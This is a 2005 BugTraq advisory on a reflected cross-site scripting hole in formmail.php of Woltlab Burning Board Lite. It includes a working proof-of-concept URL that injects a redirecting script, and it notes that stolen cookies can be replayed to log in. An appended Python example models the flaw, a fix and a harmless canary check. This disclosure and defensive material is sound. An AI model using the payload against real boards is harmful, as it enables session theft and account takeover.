BugTraq
Security Advisory: Woltlab Burning Board Lite formmail.php XSS
Jan 08 2005 07:29PM
Martin Heistermann (martin heistermann web de)
Advisory Information
--------------------
Advisory name : Woltlab Burning Board Lite formmail.php XSS
Discovered by : drhankey / it-security23.net
Vendor Name : Woltlab
Vendor Homepage : http://www.woltlab.de
Software : Woltlab Burning Board Lite
Vulnerability Type : Cross-Site-Scripting
Vulnerable Versions : 1.0.0, 1.0.1e, possibly others
Platforms : OS Independent, PHP
What is Woltlab Burning Board Lite?
----------------------------------
Woltlab Burning Board Lite is the free version of the Woltlab Burning Board,
a PHP-based bulletin board.
Vulnerability Description:
-------------------------
formmail.php echoes the "userid" parameter into the page without filtering or encoding it, so a crafted link can inject arbitrary HTML and script into the output (reflected cross-site scripting).
The board also accepts a stolen cookie as a valid login, so a cookie captured from a victim who follows such a link can be replayed to log in as that user.
Proof of Concept:
-----------------
http://website/board/formmail.php?userid=1"><script>document.location.href="http://www.it-security23.net";</script x="y
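The following is an added example, not code from Woltlab Burning Board Lite or from the advisory author. It models the flaw described above (the userid value written into markup unchanged), shows the fix (keep only the integer, then HTML-encode), and gives an offline check that classifies a fetched response as reflecting a probe value raw, encoded, or not at all. The template shape (userid echoed into a hidden input), the host "website", and all function names are assumptions; only the PoC payload string is taken from the advisory.

```python
"""Model of the formmail.php "userid" reflection, the fix, and an offline check.

Added example, not code from Woltlab Burning Board Lite. The template shape
(userid echoed into a hidden input) is an assumption; the real page may echo it
elsewhere, but the encoding rule is the same wherever it lands.
"""
import html
import re
from urllib.parse import urlencode, urlunsplit

# Payload from the advisory's proof of concept (the userid value only).
POC_PAYLOAD = ('1"><script>document.location.href='
               '"http://www.it-security23.net";</script x="y')

# Harmless canary for testing: breaks out of a quoted attribute and opens a tag,
# which proves raw reflection without running any script on the target.
CANARY = 'xsscheck"><u>'


def build_probe_url(board_root, userid_value):
    """Build http://host/board/formmail.php?userid=<value>, percent-encoding the value.

    board_root is e.g. "http://website/board" (hypothetical host, as in the advisory).
    """
    scheme, rest = board_root.split("://", 1)
    host, _, path = rest.partition("/")
    path = path.strip("/")
    path = "/" + path + "/formmail.php" if path else "/formmail.php"
    return urlunsplit((scheme, host, path, urlencode({"userid": userid_value}), ""))


def render_formmail_vulnerable(userid):
    """The flaw as the advisory describes it: the parameter is written into the
    page unchanged, so a double quote ends the attribute and the rest is markup."""
    return f'<input type="hidden" name="userid" value="{userid}">'


def render_formmail_fixed(userid):
    """Hardened version. userid is a numeric key, so keep only a leading integer
    (mirroring PHP's intval()), then HTML-encode it anyway so the output stays
    safe if the field is ever allowed to carry text."""
    match = re.match(r"\s*-?\d+", str(userid))
    uid = int(match.group()) if match else 0
    return f'<input type="hidden" name="userid" value="{html.escape(str(uid), quote=True)}">'


def classify_reflection(body, canary=CANARY):
    """Classify a response body fetched for ?userid=<canary>:
    'raw'     - canary present with quote and brackets intact (reflected XSS)
    'encoded' - canary present only in HTML-encoded form (output is encoded)
    'absent'  - canary not reflected at all (dropped, cast to int or rejected)"""
    if canary in body:
        return "raw"
    if html.escape(canary, quote=True) in body:
        return "encoded"
    return "absent"


if __name__ == "__main__":
    print(build_probe_url("http://website/board", POC_PAYLOAD))
    print(render_formmail_vulnerable(POC_PAYLOAD))
    print(render_formmail_fixed(POC_PAYLOAD))
    for name, page in (("vulnerable", render_formmail_vulnerable(CANARY)),
                       ("fixed", render_formmail_fixed(CANARY))):
        print(name, "->", classify_reflection(page))
```

Against a live board, the check is to request the probe URL with the canary (not the redirecting PoC) and pass the response body to classify_reflection; "raw" confirms the advisory's finding, "encoded" or "absent" means the parameter is being handled. The integer cast alone would close this particular hole, but encoding on output is the rule that survives the next template change.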
Copyright 2010, SecurityFocus